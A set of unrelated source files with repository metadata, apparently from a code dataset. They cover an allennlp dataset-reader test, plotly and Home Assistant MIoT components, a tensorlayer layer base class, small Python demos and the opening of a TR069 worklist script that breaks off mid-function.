3ed8cf2c724d861b36c3e9fce3019c5683c8331a | 27089ed5ea5f81949a6d62d08465ed92d9194fdd | /allennlp/tests/data/dataset_readers/universal_dependencies_multilingual_dataset_reader_test.py | 8bf51a05a0ccc44176c39258c653be1662a0c991 | [
"Apache-2.0"
] | permissive | Whu-wxy/allennlp | 5c87bd0916cfea51ce7ceef45b9363579d19b670 | c863900e3e1fe7be540b9a0632a7a032491fc3ab | refs/heads/master | 2021-06-27T19:34:04.720649 | 2019-09-10T15:21:40 | 2019-09-10T15:21:40 | 168,892,873 | 6 | 3 | Apache-2.0 | 2019-08-20T13:08:37 | 2019-02-03T00:17:13 | Python | UTF-8 | Python | false | false | 6,961 | py | # pylint: disable=no-self-use,invalid-name
from allennlp.data.dataset_readers import UniversalDependenciesMultiLangDatasetReader
from allennlp.common.testing import AllenNlpTestCase
class TestUniversalDependenciesMultilangDatasetReader(AllenNlpTestCase):
    """Tests for reading the multi-lingual Universal Dependencies fixtures."""
    data_path = AllenNlpTestCase.FIXTURES_ROOT / "data" / "dependencies_multilang" / "*"

    def check_two_instances(self, instance1, instance2):
        """Verify a consecutive pair of instances against the known fixture
        trees and return their (shared) language code."""
        fields1, fields2 = instance1.fields, instance2.fields
        lang1 = fields1['metadata'].metadata['lang']
        lang2 = fields2['metadata'].metadata['lang']
        assert lang1 == lang2
        lang = lang1
        if lang == 'fr':
            assert [t.text for t in fields1["words"].tokens] == [
                'Ses', 'habitants', 'sont', 'appelés', 'les', 'Paydrets',
                'et', 'les', 'Paydrètes', ';']
            assert fields1["pos_tags"].labels == [
                'DET', 'NOUN', 'VERB', 'VERB', 'DET',
                'NOUN', 'CONJ', 'DET', 'NOUN', '.']
            assert fields1["head_tags"].labels == [
                'poss', 'nsubjpass', 'auxpass', 'ROOT', 'det', 'attr',
                'cc', 'det', 'conj', 'p']
            assert fields1["head_indices"].labels == [2, 4, 4, 0, 6, 4, 6, 9, 6, 4]
            assert [t.text for t in fields2["words"].tokens] == [
                'Cette', 'tour', 'de', 'a', 'été', 'achevée', 'en', '1962', '.']
            assert fields2["pos_tags"].labels == [
                'DET', 'NOUN', 'ADP', 'VERB', 'VERB', 'VERB', 'ADP', 'NUM', '.']
            assert fields2["head_tags"].labels == [
                'det', 'nsubjpass', 'adpmod', 'aux', 'auxpass', 'ROOT',
                'adpmod', 'adpobj', 'p']
            assert fields2["head_indices"].labels == [2, 6, 2, 6, 6, 0, 6, 7, 6]
        elif lang == 'es':
            assert [t.text for t in fields1["words"].tokens] == [
                'Aclarando', 'hacia', 'todo', 'el', 'mundo', 'Valderrama', 'Y',
                'Eduardo', 'Son', 'La', 'Misma', 'Persona', '.']
            assert fields1["pos_tags"].labels == [
                'VERB', 'ADP', 'DET', 'DET', 'NOUN', 'NOUN', 'CONJ',
                'NOUN', 'NOUN', 'DET', 'ADJ', 'NOUN', '.']
            assert fields1["head_tags"].labels == [
                'ROOT', 'adpmod', 'det', 'det', 'adpobj', 'nsubj', 'cc', 'conj',
                'xcomp', 'det', 'amod', 'attr', 'p']
            assert fields1["head_indices"].labels == [0, 1, 5, 5, 2, 9, 6, 6, 1, 12, 12, 9, 1]
            assert [t.text for t in fields2["words"].tokens] == [
                'Es', 'un', 'bar', 'disfrazado', 'de', 'restaurante',
                'la', 'comida', 'esta', 'demasiado', 'salada', '.']
            assert fields2["pos_tags"].labels == [
                'VERB', 'DET', 'NOUN', 'VERB', 'ADP', 'NOUN',
                'DET', 'NOUN', 'VERB', 'PRON', 'ADJ', '.']
            assert fields2["head_tags"].labels == [
                'ROOT', 'det', 'attr', 'partmod', 'adpmod', 'adpobj',
                'det', 'nsubj', 'parataxis', 'nmod', 'acomp', 'p']
            assert fields2["head_indices"].labels == [0, 3, 1, 3, 4, 5, 8, 9, 1, 11, 9, 1]
        elif lang == 'it':
            assert [t.text for t in fields1["words"].tokens] == [
                'Inconsueto', 'allarme', 'alla', 'Tate', 'Gallery', ':']
            assert fields1["pos_tags"].labels == ['ADJ', 'NOUN', 'ADP', 'NOUN', 'NOUN', '.']
            assert fields1["head_tags"].labels == ['amod', 'ROOT', 'adpmod', 'dep', 'adpobj', 'p']
            assert fields1["head_indices"].labels == [2, 0, 2, 5, 3, 2]
            assert [t.text for t in fields2["words"].tokens] == [
                'Hamad', 'Butt', 'è', 'morto', 'nel', '1994', 'a', '32', 'anni', '.']
            assert fields2["pos_tags"].labels == [
                'NOUN', 'NOUN', 'VERB', 'VERB', 'ADP', 'NUM', 'ADP', 'NUM', 'NOUN', '.']
            assert fields2["head_tags"].labels == [
                'dep', 'nsubj', 'aux', 'ROOT', 'adpmod', 'adpobj',
                'adpmod', 'num', 'adpobj', 'p']
            assert fields2["head_indices"].labels == [2, 4, 4, 0, 4, 5, 4, 9, 7, 4]
        return lang

    def test_iterate_once_per_file_when_first_pass_for_vocab_is_true(self):
        reader = UniversalDependenciesMultiLangDatasetReader(
            languages=['es', 'fr', 'it'], is_first_pass_for_vocab=True)
        instances = list(reader.read(str(self.data_path)))
        assert len(instances) == 6
        # Each fixture file contributes one consecutive pair of instances.
        processed_langs = [self.check_two_instances(instances[i], instances[i + 1])
                           for i in (0, 2, 4)]
        assert {'es', 'fr', 'it'} <= set(processed_langs)

    def test_iterate_forever_when_first_pass_for_vocab_is_false(self):
        """Note: assumes that each data file contains no more than 20 trees."""
        reader = UniversalDependenciesMultiLangDatasetReader(languages=['es', 'fr', 'it'],
                                                             is_first_pass_for_vocab=False,
                                                             instances_per_file=1,
                                                             lazy=True)
        counters = {'es': 0, 'fr': 0, 'it': 0}
        for instance in reader.read(str(self.data_path)):
            lang = instance.fields['metadata'].metadata['lang']
            if lang not in counters:
                continue
            counters[lang] += 1
            if counters[lang] > 20:
                break
        # Asserting that the reader didn't stop after reading the three files once.
        assert any(count > 20 for count in counters.values())
| [
"[email protected]"
] | |
f5b3c461ce5399f255d6a71987c9096f64d5f927 | a46d135ba8fd7bd40f0b7d7a96c72be446025719 | /packages/python/plotly/plotly/validators/histogram2dcontour/colorbar/_nticks.py | ed0d7d4831c51818983ca85921168266da541e9f | [
"MIT"
] | permissive | hugovk/plotly.py | 5e763fe96f225d964c4fcd1dea79dbefa50b4692 | cfad7862594b35965c0e000813bd7805e8494a5b | refs/heads/master | 2022-05-10T12:17:38.797994 | 2021-12-21T03:49:19 | 2021-12-21T03:49:19 | 234,146,634 | 0 | 0 | MIT | 2020-01-15T18:33:43 | 2020-01-15T18:33:41 | null | UTF-8 | Python | false | false | 471 | py | import _plotly_utils.basevalidators
class NticksValidator(_plotly_utils.basevalidators.IntegerValidator):
    """Integer validator for ``histogram2dcontour.colorbar.nticks``."""
    def __init__(self, plotly_name="nticks", parent_name="histogram2dcontour.colorbar", **kwargs):
        # Defaults are applied only when the caller did not override them.
        kwargs.setdefault("edit_type", "colorbars")
        kwargs.setdefault("min", 0)
        super(NticksValidator, self).__init__(
            plotly_name=plotly_name, parent_name=parent_name, **kwargs
        )
| [
"[email protected]"
] | |
55c142fb77a38d5d16184d5d8309e2e0f55df2f5 | 7dd25a39d91d1f03791eeb2f39c8bdf825b24601 | /test/input/only_describe.py | d2fda863179b3b0133448712f18e512f546add7e | [] | no_license | rlgomes/pocha | a281736f35e6d53b0c56f5bca946bd494b0bb6cf | 8be091fcf73b57e8c7e9efe17e8452d639e18dd7 | refs/heads/master | 2022-09-18T19:34:56.991444 | 2019-06-03T14:26:09 | 2019-06-03T14:26:09 | 62,520,589 | 51 | 12 | null | 2022-07-06T19:22:06 | 2016-07-04T00:20:44 | Python | UTF-8 | Python | false | false | 326 | py | from pocha import describe, it
# Test fixture for pocha's `only` option: with the second suite marked
# only=True, a conforming runner should execute just 'third it' / 'fourth it'
# and skip the first suite entirely.
# NOTE(review): both suite functions share the name `describe1`; that looks
# intentional for a fixture -- the decorator presumably registers the suite
# by its description string rather than the function name. Confirm against
# the runner.
@describe('first describe')
def describe1():
    @it('first it')
    def _():
        pass
    @it('second it')
    def _():
        pass
@describe('second describe', only=True)
def describe1():
    @it('third it')
    def _():
        pass
    @it('fourth it')
    def _():
        pass
| [
"[email protected]"
] | |
d8a6a59cd6d3c2b41ee795ed6735211d1f58ba41 | 031d4491fcd2a9620e72710e000bae8afd92bbcb | /custom_components/xiaomi_miot_raw/water_heater.py | 733f78a5484764a0a2ca8a518fa2a35093cce782 | [
"Apache-2.0"
] | permissive | hzh-hzh/xiaomi_miot_raw | 76717aa4803cf4e006d39bc685fd225724692292 | 8f8de5cc6f0eeae55770ec08cb3ff9ebcb75c422 | refs/heads/master | 2023-07-12T19:13:11.206861 | 2021-08-13T14:46:31 | 2021-08-13T14:46:31 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,698 | py | import asyncio
import json
import logging
from collections import OrderedDict
from datetime import timedelta
from functools import partial
from typing import Optional
import async_timeout
import homeassistant.helpers.config_validation as cv
import voluptuous as vol
from aiohttp import ClientSession
from homeassistant.components import water_heater
from homeassistant.components.water_heater import (
SUPPORT_AWAY_MODE,
SUPPORT_OPERATION_MODE,
SUPPORT_TARGET_TEMPERATURE,
WaterHeaterEntity,
PLATFORM_SCHEMA,
)
from homeassistant.const import *
from homeassistant.exceptions import PlatformNotReady
from homeassistant.helpers import aiohttp_client
from miio.exceptions import DeviceException
from .deps.miio_new import MiotDevice
import copy
from . import GenericMiotDevice, ToggleableMiotDevice, dev_info, async_generic_setup_platform
from .climate import MiotClimate
from .deps.const import (
DOMAIN,
CONF_UPDATE_INSTANT,
CONF_MAPPING,
CONF_CONTROL_PARAMS,
CONF_CLOUD,
CONF_MODEL,
ATTR_STATE_VALUE,
ATTR_MODEL,
ATTR_FIRMWARE_VERSION,
ATTR_HARDWARE_VERSION,
SCHEMA,
MAP,
DUMMY_IP,
DUMMY_TOKEN,
)
TYPE = 'water_heater'  # Home Assistant platform implemented by this module
_LOGGER = logging.getLogger(__name__)
DEFAULT_NAME = "Generic MIoT " + TYPE
DATA_KEY = TYPE + '.' + DOMAIN
# Extend the stock water_heater platform schema with the shared MIoT options.
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend(
    SCHEMA
)
SCAN_INTERVAL = timedelta(seconds=10)  # polling interval for device state
# pylint: disable=unused-argument
async def async_setup_platform(hass, config, async_add_devices, discovery_info=None):
    """Set up the MIoT water heater platform from YAML configuration.

    The legacy ``@asyncio.coroutine`` decorator was removed: it is redundant
    on an ``async def`` function and was dropped from the standard library
    in Python 3.11, where it would raise AttributeError at import time.
    """
    await async_generic_setup_platform(
        hass,
        config,
        async_add_devices,
        discovery_info,
        TYPE,
        {'default': MiotWaterHeater},
    )
async def async_setup_entry(hass, config_entry, async_add_entities):
    # Prefer the runtime-edited config stored under DOMAIN, falling back to
    # the immutable data of the config entry itself.
    config = hass.data[DOMAIN]['configs'].get(config_entry.entry_id, dict(config_entry.data))
    await async_setup_platform(hass, config, async_add_entities)
async def async_unload_entry(hass, config_entry, async_add_entities):
    # Nothing platform-specific to tear down; report success.
    return True
class MiotWaterHeater(ToggleableMiotDevice, WaterHeaterEntity):
    """Home Assistant water_heater entity backed by a generic MIoT device.

    Device attributes (temperatures, operation mode) are refreshed by the
    base-class polling cycle and mirrored into the fields Home Assistant
    reads through the properties below.
    """
    def __init__(self, device, config, device_info, hass, main_mi_type):
        ToggleableMiotDevice.__init__(self, device, config, device_info, hass, main_mi_type)
        # Populated later from polled state in _handle_platform_specific_attrs.
        self._target_temperature = None
        self._unit_of_measurement = TEMP_CELSIUS
        self._away = None
        self._current_operation = None
        self._current_temperature = None
    @property
    def supported_features(self):
        """Return the list of supported features."""
        s = SUPPORT_OPERATION_MODE
        # Only advertise temperature control when the device maps it.
        if self._did_prefix + 'target_temperature' in self._mapping:
            s |= SUPPORT_TARGET_TEMPERATURE
        return s
    @property
    def temperature_unit(self):
        """Return the unit of measurement."""
        return self._unit_of_measurement
    @property
    def current_operation(self):
        """Return current operation ie. heat, cool, idle."""
        return self._current_operation
    @property
    def target_temperature(self):
        """Return the temperature we try to reach."""
        return self._target_temperature
    @property
    def min_temp(self):
        """Return the lower bound of the target temperature range."""
        return self._ctrl_params['target_temperature']['value_range'][0]
    @property
    def max_temp(self):
        """Return the upper bound of the target temperature range."""
        # Docstring fixed: the original said "lowbound" for both properties.
        return self._ctrl_params['target_temperature']['value_range'][1]
    @property
    def current_temperature(self):
        """Return the current temperature."""
        return self._current_temperature
    @property
    def operation_list(self):
        """Return available operation modes: on/off (if switchable) plus device modes."""
        ops = ["on", "off"] if self._did_prefix + 'switch_status' in self._mapping else []
        if 'mode' in self._ctrl_params:
            ops += list(self._ctrl_params['mode'].keys())
        return ops
    async def async_set_temperature(self, **kwargs):
        """Set new target temperatures."""
        if kwargs.get(ATTR_TEMPERATURE) is not None:
            result = await self.set_property_new(self._did_prefix + "target_temperature", kwargs.get(ATTR_TEMPERATURE))
            if result:
                self._target_temperature = kwargs.get(ATTR_TEMPERATURE)
                self.async_write_ha_state()
    async def async_set_operation_mode(self, operation_mode):
        """Set new operation mode ("on", "off" or a device-specific mode)."""
        if operation_mode == 'on':
            await self.async_turn_on()
            if self._state == True:
                self._current_operation = 'on'
        elif operation_mode == 'off':
            await self.async_turn_off()
            if self._state == False:
                self._current_operation = 'off'
        else:
            result = await self.set_property_new(self._did_prefix + "mode", self._ctrl_params['mode'][operation_mode])
            if result:
                self._current_operation = operation_mode
        self.async_write_ha_state()
    def _handle_platform_specific_attrs(self):
        """Mirror freshly polled device attributes into the entity fields."""
        super()._handle_platform_specific_attrs()
        # Each lookup is best effort: polled attrs may be missing or partial.
        try:
            self._target_temperature = self._state_attrs.get(self._did_prefix + 'target_temperature')
        except Exception:
            pass
        try:
            self._current_temperature = self._state_attrs.get(self._did_prefix + 'temperature')
        except Exception:
            pass
        try:
            o = self._state_attrs.get(self._did_prefix + 'mode')
            if o in ('on', 'off'):
                self._current_operation = o
            elif o is not None:
                # BUGFIX: the looked-up mode name was computed but never
                # stored, so mode changes made on the device itself were
                # never reflected in Home Assistant.
                self._current_operation = self.get_key_by_value(self._ctrl_params['mode'], o)
        except Exception:
            pass
| [
"[email protected]"
] | |
c238b36926219fbf87c188545260cdff53b761e8 | 4e8674d7c83254aba7f2d327f16d5ad202a189b6 | /src/select_centered_text.py | b072d911fa1e942f3c5aedc591f19b9b7d3468da | [] | no_license | raysmith619/dots | 0f5e34b17675cfb0903a20eda86493d37676b500 | c44ff3ebf57ec73c6fd8b7898cbc186668f83915 | refs/heads/master | 2021-06-17T02:34:48.850425 | 2021-04-27T13:54:24 | 2021-04-27T13:54:24 | 205,397,035 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,376 | py | # select_centered_text.py
""" Centered Text near/within Part
"""
from pip._vendor.distlib import resources
from PIL._imaging import display
class CenteredText:
    """Text centered near/within a board part, with optional position, font,
    colors and size, plus the canvas tags used when it is rendered live.
    """
    def __init__(self, part, text, x=None, y=None,
                 font_name=None,
                 color=None, color_bg=None,
                 height=None, width=None):
        """Set up an instance of centered text.
        :part: part in which the centered text is placed
        :text: text string to place
        :x:, :y: optional position of the text
        :font_name: optional font name
        :color:, :color_bg: optional foreground / background colors
        :height:, :width: optional size of the text area
        """
        self.part = part
        self.text = text
        self.x = x
        self.y = y
        self.font_name = font_name
        self.color = color
        self.color_bg = color_bg
        self.height = height
        self.width = width
        self.text_tag = None      # Canvas text tag, if live
        self.text_bg_tag = None   # Canvas text background tag, if live
        # Keep a reference so Tk doesn't garbage-collect the image:
        # http://effbot.org/pyfaq/why-do-my-tkinter-images-not-appear.htm
        self.image = None
    def __str__(self):
        """Human-readable description of the centered text.
        Unlike the original implementation, a missing coordinate is shown
        as 0 without being written back onto the instance.
        """
        st = self.text
        if self.x is not None or self.y is not None:
            x = 0 if self.x is None else self.x
            y = 0 if self.y is None else self.y
            st += f" at:x={x} y={y}"
        if self.font_name is not None:
            st += f" font={self.font_name}"
        if self.color is not None:
            st += " %s" % self.color
        if self.color_bg is not None:
            st += " bg=%s" % self.color_bg
        if self.height is not None:
            st += " height=%d" % self.height
        if self.width is not None:
            # BUGFIX: the original formatted self.height here, reporting the
            # wrong width (and crashing when only width was set).
            st += " width=%d" % self.width
        if self.text_tag is not None:
            st += " text_tag=%d" % self.text_tag
        return st
    def delete(self):
        """Delete centered text canvas resources (text and background tags)."""
        if self.text_tag is not None:
            self.part.sel_area.canvas.delete(self.text_tag)
            self.text_tag = None
        if self.text_bg_tag is not None:
            self.part.sel_area.canvas.delete(self.text_bg_tag)
            self.text_bg_tag = None
    def destroy(self):
        """Remove the object from the display."""
        self.delete()
"[email protected]"
] | |
7939e6ea94738d2a078b9885647f393ef60e84d9 | e982ad81d18e3a983756b4c90311b007b9d5e276 | /pyspec/cui/api.py | 6ff27e71232a9ebc13a3583cc49048a8f6fdffda | [
"MIT"
] | permissive | jyotijaya/pyspec | 2ca4428c3c9924154f7467edbdc1d8fddd59a817 | ae7a4de39beb3cf2e0838b6c3a9ef73d082445eb | refs/heads/master | 2022-12-27T20:42:15.818388 | 2020-10-01T11:50:19 | 2020-10-01T11:50:19 | 300,260,536 | 0 | 0 | NOASSERTION | 2020-10-01T11:49:40 | 2020-10-01T11:49:39 | null | UTF-8 | Python | false | false | 938 | py | # -*- coding: ascii -*-
"""PySpec extension api.
This module enable following extension features:
- Add aspect to modules, classes, methods
- Add Add-in
"""
__pyspec = 1
import os
import sys
from pyspec.api import (ModuleAspect, ClassAspect, MethodAspect,
EventHandlerRegister)
def entry_point(method):
    """Notify that the target method is a special function of a pyspec extension.
    The method name must be one of the following:
    add_trace() : not implemented yet
    add_profile() : not implemented yet
    """
    modules = sys.modules
    if "pyspec.addin" in modules:
        modules["pyspec.addin"].AddinLoaderBase.add_entry_point(method)
def event_handler(event_type):
    """Return an EventHandlerRegister for one of the supported event types.

    :event_type: one of "init_optparse", "read_option", "on_run_test",
                 "on_finish_test"
    :raises ValueError: for any other event type
    """
    if event_type not in ("init_optparse", "read_option", "on_run_test",
                          "on_finish_test"):
        # BUGFIX: the original constructed this ValueError without raising
        # it, so invalid event types were silently accepted.
        raise ValueError("Invalid event type: %s" % event_type)
    return EventHandlerRegister(event_type)
| [
"[email protected]"
] | |
d48f2013149fc23461f3610f581057cca53e282a | 0fcc6353edee4eed7a1ea4b1c89a00bfcf03e851 | /PIP/PIPOne.py | 1f984b5b25866edabb8a0c8eb992db91bdd80bb5 | [] | no_license | GANESH0080/Python-Practice-Again | 81d8048c23d338a99bb17fa86a9f87b3057bfe52 | 6565911d14a22d0f33a41b417026c31a0a066be5 | refs/heads/master | 2020-09-20T03:40:45.462869 | 2019-11-27T07:19:24 | 2019-11-27T07:19:24 | 224,368,129 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 217 | py | # A package contains all the files you need for a module.
# Modules are Python code libraries you can include in your project.
import camelcase  # third-party package (pip install camelcase); demonstrates using a pip-installed module
c = camelcase.CamelCase()
txt = "hello world sds"
# NOTE(review): the script's final line prints c.hump(txt); presumably
# .hump() capitalises each word -- confirm against the camelcase package.
print(c.hump(txt)) | [
"[email protected]"
] | |
a1534181fc0cd816f25bc60d6a459e6c443e1409 | d59bad348c88026e444c084e6e68733bb0211bc2 | /poo/todo_v1.py | 8f1eccc7c345536890820623508af901ad2a3a7e | [] | no_license | dersonf/udemy-python | f96ec883decb21a68233b2e158c82db1c8878c7a | 92471c607d8324902902774284f7ca81d2f25888 | refs/heads/master | 2022-09-25T00:18:49.833210 | 2020-06-05T18:18:38 | 2020-06-05T18:18:38 | 262,049,238 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 667 | py | #!/usr/bin/python3
from datetime import datetime
class Tarefa:
    """A to-do item: a description, a done flag and a creation timestamp."""

    def __init__(self, descricao):
        self.descricao = descricao
        self.feito = False
        self.criacao = datetime.now()

    def concluir(self):
        """Mark this task as done."""
        self.feito = True

    def __str__(self):
        sufixo = ' (Concluída)' if self.feito else ''
        return f'{self.descricao}{sufixo}'
def main():
    """Build a small chore list, complete one item and print them all."""
    casa = [
        Tarefa('Passar roupa'),
        Tarefa('Lavar prato'),
        Tarefa('Lavar roupa'),
    ]
    # A plain loop replaces the original side-effect-only list comprehension
    # (an anti-pattern: it built and discarded a throwaway list).
    for tarefa in casa:
        if tarefa.descricao == 'Lavar prato':
            tarefa.concluir()
    for tarefa in casa:
        print(f'- {tarefa}')
if __name__ == '__main__':
    main()  # run the demo only when executed directly
| [
"[email protected]"
] | |
d15e95600618fea0344edfd9dd5bab824ec4c949 | 5517b91a4be684d822d35a6c2bd8d21f1098aebc | /tensorlayer/core/engine/layer.py | 0064ab73e3bfb5f364568352e0f5f7aa2181fbd7 | [
"BSD-2-Clause"
] | permissive | zhengruiguo/dragon | 785f52a2eaba0899b2e598a4365adf1b43e07b38 | 3dfb6ea55d90d2fb2da9b1b471f5e1e7d7667810 | refs/heads/master | 2023-05-31T22:48:42.157381 | 2021-06-29T01:59:24 | 2021-06-29T01:59:24 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,342 | py | # ------------------------------------------------------------
# Copyright (c) 2017-present, SeetaTech, Co.,Ltd.
# Copyright (c) 2016-2018, The TensorLayer contributors.
#
# Licensed under the BSD 2-Clause License.
# You should have received a copy of the BSD 2-Clause License
# along with the software. If not, See,
#
# <https://opensource.org/licenses/BSD-2-Clause>
#
# ------------------------------------------------------------
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from dragon.core.util import nest
from dragon.vm.tensorlayer.core import activations
from dragon.vm.tensorlayer.core.engine import module
from dragon.vm.tensorlayer.core.engine import node
class Layer(module.Module):
    """The base layer abstraction of a neural network.
    It should be subclassed when implementing new types of layers:
    ```python
    class MyLayer(tl.layers.Layer):
        def __init__(name=None, act=None):
            super(MyLayer, self).__init__(name=name, act=act)
    ```
    """
    def __init__(self, name=None, act=None, *args, **kwargs):
        """Create a new ``Layer``.
        Parameters
        ----------
        name : str, optional.
            The layer name.
        act : str or function, optional
            The optional activation.
        """
        super(Layer, self).__init__(name=name)
        # Weights are created lazily on the first invocation (see ``__call__``).
        self._built = False
        # One ``LayerNode`` is recorded per forward call until ``_fix_nodes``.
        self._nodes = []
        self._nodes_fixed = False
        # Resolve the activation (string name or callable) into a callable.
        self.act = activations.get(act)
    @property
    def all_weights(self):
        """Return all the weights, both trainable and non-trainable.
        Returns
        -------
        Sequence[dragon.Tensor]
            The weights sequence.
        """
        return self.trainable_weights + self.nontrainable_weights
    @property
    def name(self):
        """Return the layer name.
        Returns
        -------
        str
            The layer name.
        """
        return super(Layer, self).name
    @property
    def nontrainable_weights(self):
        """Return the non-trainable weights.
        Returns
        -------
        Sequence[dragon.Tensor]
            The weights sequence.
        """
        # NOTE(review): ``_nontrainable_weights`` is not assigned in this class;
        # presumably maintained by the base ``module.Module`` -- confirm.
        return self._nontrainable_weights
    @property
    def trainable_weights(self):
        """Return the trainable weights.
        Returns
        -------
        Sequence[dragon.Tensor]
            The weights sequence.
        """
        # NOTE(review): ``_trainable_weights`` is not assigned in this class;
        # presumably maintained by the base ``module.Module`` -- confirm.
        return self._trainable_weights
    @module.Module.training.setter
    def training(self, mode):
        """Set the training mode.
        Parameters
        ----------
        mode : bool
            ``True`` for training otherwise evaluation.
        """
        self._training = mode
    def build(self, input_shapes):
        """Method to define the weights.
        Parameters
        ----------
        input_shapes : Sequence[Sequence[int]]
            The shape of inputs.
        """
        # Subclasses create their weights here, then mark the layer built so
        # ``__call__`` does not build again.
        self._built = True
    def forward(self, inputs):
        """Method to define the forward operations.
        Parameters
        ----------
        inputs : Sequence[dragon.Tensor]
            The inputs.
        Returns
        -------
        Sequence[dragon.Tensor]
            The outputs.
        """
        # Intentionally a no-op: subclasses override this.
        pass
    def _add_node(self, inputs, outputs):
        """Add a layer node for inputs and outputs.
        Parameters
        ----------
        inputs : Sequence[dragon.Tensor]
            The input tensors.
        outputs : Sequence[dragon.Tensor]
            The output tensors.
        """
        inputs = nest.flatten(inputs)
        outputs = nest.flatten(outputs)
        # ``_info`` is (producing node, output index); absent on graph inputs,
        # hence the [None, None] fallback.
        input_info = [getattr(e, '_info', [None, None]) for e in inputs]
        self._nodes.append(
            node.LayerNode(
                self,
                node_index=len(self._nodes),
                in_nodes=[e[0] for e in input_info],
                in_tensor_idxes=[e[1] for e in input_info],
                in_tensors=inputs,
                out_tensors=outputs,
            )
        )
        # Tag each output so downstream layers can find its producing node.
        for idx, tensor in enumerate(outputs):
            tensor._info = (self._nodes[-1], idx)
    def _fix_nodes(self):
        """Fix layer nodes to stop growing."""
        self._nodes_fixed = True
    def __call__(self, inputs, **kwargs):
        """The preprocessor for ``self.forward(...)``."""
        # Maybe build the layer at the first time.
        if not self._built:
            input_list = nest.flatten(inputs)
            input_shapes = None
            if all(hasattr(x, 'shape') for x in input_list):
                input_shapes = [x.shape for x in input_list]
                if not nest.is_sequence(inputs):
                    input_shapes = input_shapes[0]
            self.build(input_shapes)
        # Call the forward implementation to get outputs.
        outputs = self.forward(inputs, **kwargs)
        # Record the nodes if necessary.
        if not self._nodes_fixed:
            self._add_node(inputs, outputs)
        return outputs
    def __delitem__(self, key):
        raise TypeError('The Layer API does not allow to use the method: `__delitem__`')
    def __repr__(self):
        return 'Layer'
    def __setitem__(self, key, item):
        raise TypeError('The Layer API does not allow to use the method: `__setitem__`')
| [
"[email protected]"
] | |
ee3872bc65c7073fd639374827e837a332116b94 | caf0ba85f1c7a2b7208e7f0acebb3c047b17b0ba | /1-py/venv/PY_17_ARCHIVOS_XML.py | a877a3074ae9230424db9c4e7b17404af91df9ce | [] | no_license | JAreina/python | 12ca9bd5467420a813ac3f33b0adba6cd492f855 | 3b9ac8d37ab2abe70e34043857f96a76c19468c8 | refs/heads/master | 2020-03-22T07:57:31.675271 | 2018-09-12T06:38:49 | 2018-09-12T06:38:49 | 139,735,465 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 296 | py | from xml.etree.ElementTree import parse
# Walk an XML document ("XML files" demo) and print every element and its text.
from xml.etree.ElementTree import parse

documento = parse("nuevo.xml")
print(documento.getroot())
# ElementTree.getiterator() was deprecated since 3.2 and removed in Python 3.9;
# iter() is the supported replacement. Materialize it so the printout below
# still shows a list of elements rather than a generator object.
iterador = list(documento.iter())
print(iterador)
for i in iterador:
    print(i)
    print(i.text)
# Print the text of every <funcion> element directly under the root.
for elemento in documento.findall("funcion"):
    print(elemento.text)
"[email protected]"
] | |
dcf41d4448f201f32272548ecf6d906cbe6c76bd | 6d5545faf2af0a6bb565ad698bb824110b40e121 | /WEBAPP/MLmodel/inception_client.py.runfiles/org_tensorflow/tensorflow/contrib/autograph/utils/__init__.py | c41b3a2134418498fd492b8af9d7642dc620e477 | [
"MIT"
] | permissive | sunsuntianyi/mlWebApp_v2 | abb129cd43540b1be51ecc840127d6e40c2151d3 | 5198685bf4c4e8973988722282e863a8eaeb426f | refs/heads/master | 2021-06-23T22:02:38.002145 | 2020-11-20T02:17:43 | 2020-11-20T02:17:43 | 162,194,249 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 134 | py | /private/var/tmp/_bazel_tianyi/f29d1e61689e4e4b318f483932fff4d0/external/org_tensorflow/tensorflow/contrib/autograph/utils/__init__.py | [
"[email protected]"
] | |
186e91145d97be619a36109db424d79ee9be5e48 | 0c1d6b8dff8bedfffa8703015949b6ca6cc83f86 | /lib/worklists/operator/CT/v4.0/business/LAN_4+1/WAN_BridgedIPv4v6_IPTV/script.py | 455937edfeda08293cde9b096481beebe08773d0 | [] | no_license | samwei8/TR069 | 6b87252bd53f23c37186c9433ce4d79507b8c7dd | 7f6b8d598359c6049a4e6cb1eb1db0899bce7f5c | refs/heads/master | 2021-06-21T11:07:47.345271 | 2017-08-08T07:14:55 | 2017-08-08T07:14:55 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,049 | py | #coding:utf-8
# -----------------------------rpc --------------------------
import os
import sys

# Debug switch: when enabled, prepend the project directories to sys.path so
# the worklist can be executed directly from a source checkout.
DEBUG_UNIT = False
if (DEBUG_UNIT):
    g_prj_dir = os.path.dirname(__file__)
    parent1 = os.path.dirname(g_prj_dir)
    parent2 = os.path.dirname(parent1)
    parent3 = os.path.dirname(parent2)
    parent4 = os.path.dirname(parent3)  # tr069v3\lib
    parent5 = os.path.dirname(parent4)  # tr069v3\
    sys.path.insert(0, parent4)
    sys.path.insert(0, os.path.join(parent4, 'common'))
    sys.path.insert(0, os.path.join(parent4, 'worklist'))
    sys.path.insert(0, os.path.join(parent4, 'usercmd'))
    sys.path.insert(0, os.path.join(parent5, 'vendor'))

from TR069.lib.common.event import *
from TR069.lib.common.error import *
from time import sleep
import TR069.lib.common.logs.log as log

# Ensure the directory holding the sibling worklist modules (_Common,
# _IPV6WANSetUP, _IPV6IPTVEnable) is first on sys.path.
g_prj_dir = os.path.dirname(__file__)
parent1 = os.path.dirname(g_prj_dir)
parent2 = os.path.dirname(parent1)  # dir is system
try:
    i = sys.path.index(parent2)
    if (i != 0):
        # Strategy: boost this path's priority so its modules shadow duplicates.
        sys.path.pop(i)
        sys.path.insert(0, parent2)
except Exception:
    # Path not present yet. The original "except Exception, e" is Python-2-only
    # syntax and the bound name was never used; catching without binding works
    # on Python 2.6+ and Python 3 alike.
    sys.path.insert(0, parent2)

# Re-import the helpers on every run so edits are picked up by a long-lived host.
import _Common
reload(_Common)
from _Common import *
import _IPV6WANSetUP
reload(_IPV6WANSetUP)
from _IPV6WANSetUP import V6WANSetUP
import _IPV6IPTVEnable
reload(_IPV6IPTVEnable)
from _IPV6IPTVEnable import IPV6IPTVEnable
def test_script(obj):
    """Provision a dual-stack (IPv4/IPv6) bridged INTERNET WAN and a bridged
